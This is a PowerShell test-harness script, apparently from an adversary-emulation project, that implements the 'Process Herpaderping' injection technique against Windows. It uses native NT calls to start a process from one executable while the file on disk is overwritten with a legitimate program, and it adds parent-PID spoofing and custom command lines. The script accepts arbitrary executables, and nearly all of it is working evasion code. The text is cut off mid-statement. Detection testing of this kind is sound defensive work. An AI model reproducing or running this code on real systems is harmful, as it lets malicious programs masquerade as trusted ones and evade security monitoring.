Windows/TestHarnesses/T1055_ProcessInjection/ProcessHerpderp.ps1
# Implementation based on Johnny Shaw's original PoC: https://github.com/jxy-s/herpaderping. Thanks, Johnny! if (-not ('AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods' -as [Type])) { $TypeDef = @' using System; using System.Runtime.InteropServices; namespace AtomicTestHarnesses_T1055_UNK { public struct LARGE_INTEGER { public uint LowPart; public int HighPart; } public struct PROCESS_BASIC_INFORMATION { public IntPtr ExitStatus; public IntPtr PebBaseAddress; public IntPtr AffinityMask; public IntPtr BasePriority; public UIntPtr UniqueProcessId; public IntPtr InheritedFromUniqueProcessId; } public struct UNICODE_STRING { public short Length; public short MaximumLength; public IntPtr Buffer; } public class ProcessNativeMethods { [DllImport("advapi32.dll", SetLastError = true)] public static extern int LsaNtStatusToWinError(int status); [DllImport("kernel32.dll", SetLastError = true)] public static extern int GetProcessId(IntPtr Process); [DllImport("kernel32.dll", SetLastError = true)] public static extern int GetThreadId(IntPtr Thread); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess( int processAccess, bool bInheritHandle, int processId); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, int flAllocationType, int flProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool ReadProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, ref IntPtr lpBuffer, UInt32 dwSize, ref UInt32 lpNumberOfBytesRead); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, UInt32 nSize, ref UInt32 lpNumberOfBytesWritten); [DllImport("ntdll.dll")] public static extern IntPtr NtCurrentProcess(); [DllImport("ntdll.dll")] public static extern int NtCreateSection( ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref LARGE_INTEGER MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); [DllImport("ntdll.dll")] public static extern int NtCreateProcessEx( ref IntPtr ProcessHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, IntPtr ParentProcess, uint Flags, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort, bool InJob); [DllImport("ntdll.dll")] public static extern int NtQueryInformationProcess( IntPtr ProcessHandle, UInt32 ProcessInformationClass, ref PROCESS_BASIC_INFORMATION ProcessInformation, UInt32 ProcessInformationLength, ref UInt32 ReturnLength); [DllImport("ntdll.dll")] public static extern int RtlCreateProcessParametersEx( ref IntPtr pProcessParameters, ref UNICODE_STRING ImagePathName, IntPtr DllPath, IntPtr CurrentDirectory, ref UNICODE_STRING CommandLine, IntPtr Environment, ref UNICODE_STRING WindowTitle, ref UNICODE_STRING DesktopInfo, IntPtr ShellInfo, IntPtr RuntimeData, UInt32 Flags); [DllImport("ntdll.dll")] public static extern int NtCreateThreadEx( ref IntPtr hThread, UInt32 DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, UInt32 StackZeroBits, UInt32 SizeOfStackCommit, UInt32 SizeOfStackReserve, IntPtr lpBytesBuffer); [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] public static extern void RtlInitUnicodeString( ref UNICODE_STRING DestinationString, String SourceString); [DllImport("ntdll.dll")] public static extern IntPtr RtlGetCurrentPeb(); [DllImport("ntdll.dll")] public static extern int NtClose( IntPtr Handle); } } '@ Add-Type -TypeDefinition $TypeDef } # Helper function. Do not export. function Get-NtStatusMessage { param ( [Parameter(Mandatory, Position = 0)] [Int] $NTStatus ) # Used to obtain the human-readable error messages for ntdll function calls. $GetMessage = [Byte].Assembly.GetType('Microsoft.Win32.Win32Native').GetMethod('GetMessage', 'NonPublic, Static', $null, [Type[]] @([Int]), $null) $WinError = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::LsaNtStatusToWinError($NTStatus) $ErrorMessage = $GetMessage.Invoke($null, @($WinError)).TrimEnd() return $ErrorMessage } # Helper function. Do not export. function New-UnicodeString { param ( [Parameter(Mandatory, Position = 0)] [ValidateNotNull()] $String ) $UnicodeString = New-Object -TypeName AtomicTestHarnesses_T1055_UNK.UNICODE_STRING [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::RtlInitUnicodeString([Ref] $UnicodeString, $String) return $UnicodeString } # Helper function. Do not export. function Get-ProcessEnvironmentBlockAddress { param ( [Parameter(Mandatory, Position = 0)] [IntPtr] $ProcessHandle ) $ProcessBasicInformation = New-Object -TypeName AtomicTestHarnesses_T1055_UNK.PROCESS_BASIC_INFORMATION $PBISize = [Runtime.InteropServices.Marshal]::SizeOf([Type][AtomicTestHarnesses_T1055_UNK.PROCESS_BASIC_INFORMATION]) [UInt32] $ReturnLength = 0 $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtQueryInformationProcess( $ProcessHandle, 0, # ProcessBasicInformation [Ref] $ProcessBasicInformation, $PBISize, [Ref] $ReturnLength ) if ($Result -eq 0) { return ($ProcessBasicInformation.PebBaseAddress) } } # Helper function. Do not export. function Get-ExecutableMachineAndEntrypointRVA { param ( [Parameter(Mandatory)] [Byte[]] $ExeBytes ) $MemoryStream = New-Object -TypeName IO.MemoryStream -ArgumentList @(,$ExeBytes) $BinaryReader = New-Object -TypeName IO.BinaryReader -ArgumentList $MemoryStream $E_MAGIC = $BinaryReader.ReadBytes(2) if ([Text.Encoding]::ASCII.GetString($E_Magic) -cne 'MZ') { Write-Error "Executable is not a valid portable executable (PE). Expected `"MZ`" magic signature." return } # Seek to e_lfanew offset $null = $MemoryStream.Seek(0x3C, 'Begin') $E_LFANEW = $BinaryReader.ReadInt32() # Seek to NT headers $null = $MemoryStream.Seek($E_LFANEW, 'Begin') $PESignature = $BinaryReader.ReadBytes(4) if ([Text.Encoding]::ASCII.GetString($PESignature[0..1]) -cne 'PE') { Write-Error "Source executable is not a valid portable executable (PE). Expected `"PE`" magic signature." return } $Machine = $BinaryReader.ReadUInt16() $AddressOfEntryPointOffset = $E_LFANEW + 0x28 $null = $MemoryStream.Seek($AddressOfEntryPointOffset, 'Begin') $AddressOfEntryPoint = $BinaryReader.ReadUInt32() $BinaryReader.Close() $MemoryStream.Close() [PSCustomObject] @{ Machine = $Machine AddressOfEntryPoint = $AddressOfEntryPoint } } function Start-ATHProcessHerpaderp { <# .SYNOPSIS Test runner for "Process Herpaderping" process injection. Technique ID: T1055 (Process Injection) .DESCRIPTION Start-ATHProcessHerpaderp starts a process masquerading as a legitimate process using the "Process Herpaderping" (https://jxy-s.github.io/herpaderping/) technique. Start-ATHProcessHerpaderp is designed to only work with 64-bit processes. .PARAMETER TargetFilePath Specifies the filename or full file path of the process that will be written to and executed. This serves as the process that will execute the contents of the source file while masquerading as the specified target process. .PARAMETER SourceFilePath Specifies the path to the executable to be executed. .PARAMETER SourceFileBytes Specifies the the executable to be executed as a byte array. This is offered as an alternative to -SourceFilePath to demonstrate that the source file need not be present on disk. .PARAMETER ReplacementFilePath Specifies the path to the executable that you want the OS to think is running. .PARAMETER ReplacementFileBytes Specifies the executable that you want the OS to think is running as a byte array. This is offered as an alternative to -ReplacementFilePath to demonstrate that the target file need not be present on disk. .PARAMETER ParentId Specifies the process ID of the process under which a process will be spawned. Note: Specifying an alternate process is not related to this injection technique but it is supported as an option considering the underlying APIs involved (RtlCreateProcessParametersEx) allow a developer to supply a handle to another process. Specifying another process to spawn from is related to T1134.004 (Access Token Manipulation: Parent PID Spoofing). .PARAMETER CommandLine Specifies the command-line of the process to be started. If -CommandLine is not specified, the target file path is used as the command-line. Note: Specifying the command-line of a process is not related to this injection technique but it is supported as an option considering the underlying APIs involved (RtlCreateProcessParametersEx) allow a developer to supply a custom command-line string. .PARAMETER TestGuid Optionally, specify a test GUID value to use to override the generated test GUID behavior. .INPUTS System.Diagnostics.Process Start-ATHProcessHerpaderp accepts the output of Get-Process. Only one Process object should be supplied to Start-ATHProcessHerpaderp. Microsoft.Management.Infrastructure.CimInstance#root/cimv2/Win32_Process Start-ATHProcessHerpaderp accepts the output of a Win32_Process WMI object via Get-CimInstance. .OUTPUTS PSObject Outputs an object consisting of relevant execution details. The following object properties may be populated: * TechniqueID - Specifies the relevant MITRE ATT&CK Technique ID. * TestSuccess - Will be set to True if it was determined that the technique executed successfully. Start-ATHProcessHerpaderp can only confidently determine success when neither -SourceFilePath nor -SourceFileBytes are supplied. In this scenario, a template exectuable that spawns a specific instance of powershell.exe is used to validate successful execution. * TestGuid - Specifies the test GUID that was used for the test. * ExecutionType - Indicates if the source/target files were supplied on disk or as a byte array. Supported output: File, Memory * SourceExecutableFilePath - Specifies the full path of the source executable. If the source executable is specified as a byte array, this property will be empty. * SourceExecutableFileHash - SHA256 hash of the source executable. * ReplacementExecutableFilePath - Specifies the full path of the replacement executable. If the replacement executable is specified as a byte array, this property will be empty. * ReplacementExecutableFileHash - SHA256 hash of the replacement executable. * TargetExecutablePath - Specifies the full path of the target executable. * ProcessId - Specifies the process ID of the target ("injected") process. * ProcessPath - Specifies the full path of the target executable. This should match TargetExecutablePath. * ProcessCommandLine - Specifies the command-line of the target process. This will consist of the target executable path by default or the value specified with the -CommandLine parameter. * ProcessModule - Specifies loaded target process module information: ModuleName, FileName, BaseAddress, ModuleMemorySize, EntryPointAddress * ProcessMainThread - Specifies information about the main thread of the target process: Id, StartAddress * ParentProcessId - Process ID of the process that the target process spawned from. * ParentProcessPath - Executable path of the process that the target process spawned from. * ParentProcessCommandLine - Command-line of the process that the child process spawned from. * ChildProcessId - Specifies the process ID of process that was executed as the result of the target process executing. * ChildProcessCommandLine - Specifies the command-line of process that was executed as the result of the target process executing. .EXAMPLE Start-ATHProcessHerpaderp .EXAMPLE Get-Process -Name explorer | Start-ATHProcessHerpaderp Perform "Process Herpadering" injection specifying the running explorer.exe process as the parent process. .EXAMPLE Start-ATHProcessHerpaderp -TargetFilePath foo.exe -SourceFilePath 'C:\Program Files\7-Zip\7zG.exe' -ReplacementFilePath 'C:\Windows\System32\SnippingTool.exe' Perform "Process Herpadering" injection by specifying source and replacement files on disk. .EXAMPLE $SourceFileBytes = [IO.File]::ReadAllBytes('C:\Program Files\7-Zip\7zG.exe') $ReplacementFileBytes = [IO.File]::ReadAllBytes('C:\Windows\System32\SnippingTool.exe') Start-ATHProcessHerpaderp -SourceFileBytes $SourceFileBytes -ReplacementFileBytes $ReplacementFileBytes Emulates source and replacement files in memory. .EXAMPLE Start-ATHProcessHerpaderp -CommandLine 'fake cmdline' Perform "Process Herpadering" injection and specifying a user-supplied command-line. #> [CmdletBinding(DefaultParameterSetName = 'File')] param ( [Parameter(ParameterSetName = 'File')] [Parameter(ParameterSetName = 'SourceAndReplacementBytes')] [String] [ValidateNotNullOrEmpty()] $TargetFilePath = 'target.exe', [Parameter(ParameterSetName = 'File')] [String] [ValidateNotNullOrEmpty()] $SourceFilePath, [Parameter(Mandatory, ParameterSetName = 'SourceAndReplacementBytes')] [Byte[]] $SourceFileBytes, [Parameter(ParameterSetName = 'File')] [String] [ValidateNotNullOrEmpty()] $ReplacementFilePath = "$Env:windir\System32\SnippingTool.exe", [Parameter(Mandatory, ParameterSetName = 'SourceAndReplacementBytes')] [Byte[]] $ReplacementFileBytes, [Parameter(ValueFromPipelineByPropertyName)] [Int] [Alias('Id')] # Supports pipelining with Get-Process [Alias('ProcessId')] # Supports pipelining with Get-CimInstance Win32_Process $ParentId, [ValidateNotNull()] $CommandLine, [Guid] $TestGuid = (New-Guid) ) if ([IntPtr]::Size -eq 4) { Write-Error 'Start-ATHProcessHerpaderp is not supported in 32-bit PowerShell.' } $ShareMode = [IO.FileShare] 'Delete, ReadWrite' # Template executable that spawns powershell.exe when neither -SourceFilePath nor -SourceFileBytes are supplied. # SHA256 Hash: 40EF383E33B1A2CEB8A6E2E8D12A81D413DE10533ED306F9CFAE6CFAA8544218 # VirusTotal Analysis: https://www.virustotal.com/gui/file/40ef383e33b1a2ceb8a6e2e8d12a81d413de10533ed306f9cfae6cfaa8544218/detection <# C code used to generate the template executable below: #include <windows.h> int main(int argc, char* argv[], char* envp[]) { UNREFERENCED_PARAMETER(argc); UNREFERENCED_PARAMETER(argv); UNREFERENCED_PARAMETER(envp); PROCESS_INFORMATION processInformation; STARTUPINFO startupInfo; BOOL creationResult; ZeroMemory(&processInformation, sizeof(processInformation)); ZeroMemory(&startupInfo, sizeof(startupInfo)); startupInfo.cb = sizeof(startupInfo); creationResult = CreateProcess( NULL, L"powershell.exe -nop -Command Write-Host AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA; Start-Sleep -Seconds 2; exit", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &startupInfo, &processInformation); return 0; } #> $TemplateSourceBytes = [Convert]::FromBase64String('') # Offset to the template GUID in the binary above. The template GUID will be replaced with the test GUID. $GuidOffset = 0x15050 $UseTemplateExecutable = $False # Resolve the full path of the target file. Relative and absolute paths should be accepted. $TargetFileParentDirectory = Split-Path -Path $TargetFilePath -Parent $TargetFileFileName = Split-Path -Path $TargetFilePath -Leaf if (('' -eq $TargetFileParentDirectory) -or ('.' -eq $TargetFileParentDirectory)) { # Use the current working directory is an explicit directory is not supplied. $TargetFileParentDirectory = $PWD.Path } $ResolvedTargetFilePath = Join-Path -Path $TargetFileParentDirectory -ChildPath $TargetFileFileName $SHA256 = [Security.Cryptography.SHA256]::Create() switch ($PSCmdlet.ParameterSetName) { 'File' { $ExecutionType = 'File' } 'SourceAndReplacementBytes' { $ExecutionType = 'Memory' } } if ($SourceFilePath) { # Validate that the source executable exists if (-not (Test-Path -Path $SourceFilePath -PathType Leaf -IsValid)) { Write-Error "$SourceFilePath is not a valid file." return } # Resolve the full path to the source file. $ResolvedSourceFilePath = Resolve-Path -Path $SourceFilePath -ErrorAction Stop # Obtain the file bytes of the source file $SourceExeBytes = [IO.File]::ReadAllBytes($ResolvedSourceFilePath.Path) $SourceExePath = $ResolvedSourceFilePath } elseif (($ExecutionType -eq 'File') -and (-not $SourceFilePath)) { $SourceExeBytes = $TemplateSourceBytes $GuidBytes = [Text.Encoding]::Unicode.GetBytes($TestGuid) # Replace the template GUID "AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA" in the test executable with the test GUID. for ($i = 0; $i -lt $GuidBytes.Length; $i++) { $SourceExeBytes[($GuidOffset + $i)] = $GuidBytes[$i] } # Drop the test executable to the current directory for easy inspection. # Note: this will have a different hash after the template GUID is replaced. [IO.File]::WriteAllBytes("$PWD\test_executable.exe", $SourceExeBytes) $SourceExePath = "$PWD\test_executable.exe" $UseTemplateExecutable = $True } else { # Source file bytes were supplied. $SourceExeBytes = $SourceFileBytes $SourceExePath = $null } $SourceExeHash = ($SHA256.ComputeHash($SourceExeBytes) | ForEach-Object { $_.ToString('X2') }) -join '' if ($PSCmdlet.ParameterSetName -eq 'File') { # Validate that the replacement executable exists if (-not (Test-Path -Path $ReplacementFilePath -PathType Leaf)) { Write-Error "$ReplacementFilePath is not a valid file." return } # Resolve the full path to the source file. $ResolvedReplacementFilePath = Resolve-Path -Path $ReplacementFilePath -ErrorAction Stop $ReplacementExeBytes = [IO.File]::ReadAllBytes($ResolvedReplacementFilePath.Path) $ReplacementExePath = $ResolvedReplacementFilePath } else { $ReplacementExeBytes = $ReplacementFileBytes $ReplacementExePath = $null } $ReplacementExeHash = ($SHA256.ComputeHash($ReplacementExeBytes) | ForEach-Object { $_.ToString('X2') }) -join '' #region Validate source PE and obtain its address of entrypoint offset. $SourcePEInfo = Get-ExecutableMachineAndEntrypointRVA -ExeBytes $SourceExeBytes if (-not $SourcePEInfo) { Write-Error 'Source executable is not a valid portable executable (PE).' return } elseif ($SourcePEInfo.Machine -ne 0x8664) { Write-Error 'Source executable is not a 64-bit portable executable (PE).' return } $AddressOfEntryPointSource = $SourcePEInfo.AddressOfEntryPoint Write-Verbose "Address of entrypoint relative virtual address (RVA) for source executable: 0x$($AddressOfEntryPointSource.ToString('X8'))" $ReplacementPEInfo = Get-ExecutableMachineAndEntrypointRVA -ExeBytes $ReplacementExeBytes if (-not $ReplacementPEInfo) { Write-Error 'Replacement executable is not a valid portable executable (PE).' return } elseif ($ReplacementPEInfo.Machine -ne 0x8664) { Write-Error 'Replacement executable is not a 64-bit portable executable (PE).' return } #endregion # In order for the OS to validate the replacement file properly, it cannot be truncated # so the replacement file must be of equal or greater size than the source file. if ($SourceExeBytes.Length -gt $ReplacementExeBytes.Length) { Write-Error "Source file cannot exceed the size of the replacement file." return } # 64-bit offsets to use $ImageBaseAddressOffset = 0x10 $ProcessParametersOffset = 0x20 $EnvironmentBlockOffset = 0x80 $EnvironmentSizeOffset = 0x03F0 Write-Verbose "Obtaining file handle for $ResolvedTargetFilePath." # Obtain a file handle to the target file, the executable that we will first write the source binary to, followed by the replacement binary. try { $TargetFileStream = [IO.File]::Open($ResolvedTargetFilePath, [IO.FileMode]::Create, [IO.FileAccess]::ReadWrite, $ShareMode) } catch { Write-Error $_ return } try { $TargetFileStream.Write($SourceExeBytes, 0, $SourceExeBytes.Count) } catch { $TargetFileStream.Close() Write-Error $_ return } if ($FlushFileBuffer) { $TargetFileStream.Flush() } $SECTION_ALL_ACCESS = 0x000F001F $PAGE_READONLY = 0x00000002 $SEC_IMAGE = 0x01000000 $SectionHandle = [IntPtr]::Zero $MaxSize = New-Object -TypeName AtomicTestHarnesses_T1055_UNK.LARGE_INTEGER Write-Verbose 'Creating a SEC_IMAGE memory section for the target process.' $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtCreateSection( [Ref] $SectionHandle, $SECTION_ALL_ACCESS, ([IntPtr]::Zero), [Ref] $MaxSize, $PAGE_READONLY, $SEC_IMAGE, $TargetFileStream.SafeFileHandle.DangerousGetHandle() ) if ($Result -ne 0) { $ErrorMessage = Get-NtStatusMessage -NTStatus $Result $ErrorString = "NtCreateSection failed. Error code: 0x$($Result.ToString('X8')). Reason: $ErrorMessage" $TargetFileStream.Close() Write-Error $ErrorString return } $PROCESS_ALL_ACCESS = 0x001FFFFF $PROCESS_CREATE_FLAGS_INHERIT_HANDLES = 0x00000004 $PROCESS_DUP_HANDLE = 0x00000040 $PROCESS_CREATE_PROCESS = 0x00000080 if ($ParentId) { $ParentProcHandle = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::OpenProcess( $PROCESS_CREATE_PROCESS -bor $PROCESS_DUP_HANDLE, # processAccess - The minimum access rights required to spawn a child process. $False, # bInheritHandle $ParentId # processId - i.e. the process ID of the process we want to spawn a child process from );$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($ParentProcHandle -eq [IntPtr]::Zero) { $ErrorString = "OpenProcess failed. Error code: 0x$($LastError.NativeErrorCode.ToString('X8')). Reason: $($LastError.Message)" $TargetFileStream.Close() Write-Error $ErrorString return } $ParentProcID = $ParentId } else { $ParentProcHandle = [IntPtr] -1 $ParentProcID = $PID } $WMIParentProcessInfo = Get-CimInstance -ClassName Win32_Process -Property ExecutablePath, CommandLine -Filter "ProcessId = $ParentProcID" $ProcessHandle = [IntPtr]::Zero Write-Verbose 'Creating the target host process.' # Known issue: Attempting to start a 32-bit process will fail on a 64-bit OS. # Expected NTSTATUS: 0xC000007B. Reason: "%1 is not a valid Win32 application." # Note: This supports specifying an alternate parent process. $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtCreateProcessEx( [Ref] $ProcessHandle, $PROCESS_ALL_ACCESS, ([IntPtr]::Zero), $ParentProcHandle, $PROCESS_CREATE_FLAGS_INHERIT_HANDLES, $SectionHandle, ([IntPtr]::Zero), ([IntPtr]::Zero), $False ) $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($SectionHandle) if ($Result -ne 0) { $ErrorMessage = Get-NtStatusMessage -NTStatus $Result $ErrorString = "NtCreateProcessEx failed. Error code: 0x$($Result.ToString('X8')). Reason: $ErrorMessage" $TargetFileStream.Close() Write-Error $ErrorString return } $ProcessID = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::GetProcessId($ProcessHandle) Write-Verbose "Process object created. Process ID: $ProcessID" Write-Verbose "Copying replacement executable contents to open target file handle." $null = $TargetFileStream.Seek(0, 'Begin') $TargetFileStream.Write($ReplacementExeBytes, 0, $ReplacementExeBytes.Length) if ($FlushFileBuffer) { $TargetFileStream.Flush() } $CurrentProcessPEBAddress = Get-ProcessEnvironmentBlockAddress -ProcessHandle (Get-Process -Id $PID | Select-Object -ExpandProperty Handle) if (-not $CurrentProcessPEBAddress) { $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error 'Failed to obtain the process environment block address for the current process.' return } $TargetProcessPEBAddress = Get-ProcessEnvironmentBlockAddress -ProcessHandle $ProcessHandle if (-not $TargetProcessPEBAddress) { $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error 'Failed to obtain the process environment block address for the target process.' return } Write-Verbose "PEB address for target process: 0x$($TargetProcessPEBAddress.ToString('X16'))" $BytesRead = 0 $TargetImageBaseAddress = [IntPtr]::Zero $TargetImageBaseAddressPtr = [IntPtr]::Add($TargetProcessPEBAddress, $ImageBaseAddressOffset) $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::ReadProcessMemory( $ProcessHandle, $TargetImageBaseAddressPtr, [Ref] $TargetImageBaseAddress, ([IntPtr]::Size), [Ref] $BytesRead );$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($Result -eq $False) { $ErrorString = "ReadProcessMemory failed. Error code: 0x$($LastError.NativeErrorCode.ToString('X8')). Reason: $($LastError.Message)" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } Write-Verbose "Image base address of target process: 0x$($TargetImageBaseAddress.ToString('X16'))" #region Initialize process parameters for the new process. # In other words, inform the OS what it is that actually needs to load. $ProcessParametersAddress = [Runtime.InteropServices.Marshal]::ReadIntPtr($CurrentProcessPEBAddress, $ProcessParametersOffset) $EnvironmentBlockAddress = [Runtime.InteropServices.Marshal]::ReadIntPtr($ProcessParametersAddress, $EnvironmentBlockOffset) $ProcessParameters = [IntPtr]::Zero if ($CommandLine) { $CommandLineString = New-UnicodeString -String $CommandLine } else { # Default to the target file path. $CommandLineString = New-UnicodeString -String "`"$TargetFilePath`"" } $WindowTitleString = New-UnicodeString -String $TargetFilePath $ImagePathName = New-UnicodeString -String $TargetFilePath $DesktopInfo = New-UnicodeString -String 'WinSta0\Default' $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::RtlCreateProcessParametersEx( [Ref] $ProcessParameters, [Ref] $ImagePathName, ([IntPtr]::Zero), ([IntPtr]::Zero), [Ref] $CommandLineString, $EnvironmentBlockAddress, [Ref] $WindowTitleString, [Ref] $DesktopInfo, ([IntPtr]::Zero), ([IntPtr]::Zero), 0 ) if ($Result -ne 0) { $ErrorMessage = Get-NtStatusMessage -NTStatus $Result $ErrorString = "RtlCreateProcessParametersEx failed. Error code: 0x$($Result.ToString('X8')). Reason: $ErrorMessage" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } # Calculate the space required to allocate the process parameters in the remote process. $ProcessParamsMaxLength = [Runtime.InteropServices.Marshal]::ReadInt32($ProcessParameters, 0) $ProcessParamsLength = [Runtime.InteropServices.Marshal]::ReadInt32($ProcessParameters, 4) $EnvironmentBlockLength = [Runtime.InteropServices.Marshal]::ReadInt32($ProcessParameters, $EnvironmentSizeOffset) $TotalProcessParamsSize = $ProcessParamsMaxLength + $EnvironmentBlockLength #endregion $RemoteProcessParamsAddress = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::VirtualAllocEx( $ProcessHandle, ([IntPtr]::Zero), $TotalProcessParamsSize, 0x3000, # MEM_COMMIT | MEM_RESERVE 0x0004 # RAGE_READWRITE );$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($RemoteProcessParamsAddress -eq [IntPtr]::Zero) { $ErrorString = "VirtualAllocEx failed. Error code: 0x$($LastError.NativeErrorCode.ToString('X8')). Reason: $($LastError.Message)" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } Write-Verbose "Process parameter memory allocated in remote process at address: 0x$($RemoteProcessParamsAddress.ToString('X16'))" $RemoteEnvironmentBlockAddress = [IntPtr]::Add($RemoteProcessParamsAddress, $ProcessParamsLength) # Write the env block address where it will be located in the remote process to the local process block prior to writing it into the remote process. [Runtime.InteropServices.Marshal]::WriteIntPtr($ProcessParameters, $EnvironmentBlockOffset, $RemoteEnvironmentBlockAddress) Write-Verbose 'Writing process parameter block to remote process.' $BytesWritten = 0 $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::WriteProcessMemory( $ProcessHandle, $RemoteProcessParamsAddress, $ProcessParameters, $TotalProcessParamsSize, [Ref] $BytesWritten );$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($Result -eq $False) { $ErrorString = "WriteProcessMemory failed. Error code: 0x$($LastError.NativeErrorCode.ToString('X8')). Reason: $($LastError.Message)" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } Write-Verbose 'Writing process parameters address to the process environment block of the remote process.' # Write the process parameters pointer to the PEB $RemoteProcessParamsPointer = [IntPtr]::Add($TargetProcessPEBAddress, $ProcessParametersOffset) # Allocate a pointer to contain the address to the process parameters $ProcessParamsPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal([IntPtr]::Size) [Runtime.InteropServices.Marshal]::WriteIntPtr($ProcessParamsPtr, $RemoteProcessParamsAddress) $BytesWritten = 0 $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::WriteProcessMemory( $ProcessHandle, $RemoteProcessParamsPointer, $ProcessParamsPtr, ([IntPtr]::Size), [Ref] $BytesWritten );$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() [Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessParamsPtr) if ($Result -eq $False) { $ErrorString = "WriteProcessMemory failed. Error code: 0x$($LastError.NativeErrorCode.ToString('X8')). Reason: $($LastError.Message)" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } if ($UseTemplateExecutable) { # Remove any extra ChildProcSpawned events Unregister-Event -SourceIdentifier 'ProcessSpawned' -ErrorAction SilentlyContinue Get-Event -SourceIdentifier 'ChildProcSpawned' -ErrorAction SilentlyContinue | Remove-Event # Trigger an event any time powershell.exe has $TestGuid in the command line. # This event should correspond to the mshta or rundll process that launched it. $WMIEventQuery = "SELECT * FROM __InstanceCreationEvent WITHIN 0.1 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'powershell.exe' AND TargetInstance.CommandLine LIKE '%$($TestGuid)%'" Write-Verbose "Registering powershell.exe child process creation WMI event using the following WMI event query: $WMIEventQuery" $null = Register-CimIndicationEvent -SourceIdentifier 'ProcessSpawned' -Query $WMIEventQuery -Action { $SpawnedProcInfo = [PSCustomObject] @{ ProcessId = $EventArgs.NewEvent.TargetInstance.ProcessId ProcessCommandLine = $EventArgs.NewEvent.TargetInstance.CommandLine } New-Event -SourceIdentifier 'ChildProcSpawned' -MessageData $SpawnedProcInfo } } $ThreadHandle = [IntPtr]::Zero $THREAD_ALL_ACCESS = 0x001FFFFF $RemoteEntryPoint = [IntPtr]::Add($TargetImageBaseAddress, $AddressOfEntryPointSource) Write-Verbose "Creating main thread in the remote process at remote entry point address: 0x$($RemoteEntryPoint.ToString('X16'))" $Result = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtCreateThreadEx( [Ref] $ThreadHandle, $THREAD_ALL_ACCESS, ([IntPtr]::Zero), $ProcessHandle, $RemoteEntryPoint, ([IntPtr]::Zero), $False, 0, 0, 0, ([IntPtr]::Zero) ) if ($Result -ne 0) { $ErrorMessage = Get-NtStatusMessage -NTStatus $Result $ErrorString = "NtCreateThreadEx failed. Error code: 0x$($Result.ToString('X8')). Reason: $ErrorMessage" $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() Write-Error $ErrorString return } $ThreadID = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::GetThreadId($ThreadHandle) Write-Verbose "Main thread created. Thread ID: $ThreadID" # WMI class necessary to easily retrieve the process command-line $WMIProcessInfo = Get-CimInstance -ClassName Win32_Process -Property ExecutablePath, CommandLine -Filter "ProcessId = $ProcessID" $ProcessInfo = Get-Process -Id $ProcessID $ProcessMainModule = $ProcessInfo.MainModule | Select-Object -Property ModuleName, FileName, BaseAddress, ModuleMemorySize, EntryPointAddress $ProcessMainThread = $ProcessInfo.Threads | Where-Object { $_.Id -eq $ThreadID } | Select-Object -Property Id, StartAddress $TestSuccess = $null $SpawnedProcCommandLine = $null $SpawnedProcProcessId = $null if ($UseTemplateExecutable) { # Wait for the test powershell.exe execution to run $ChildProcSpawnedEvent = Wait-Event -SourceIdentifier 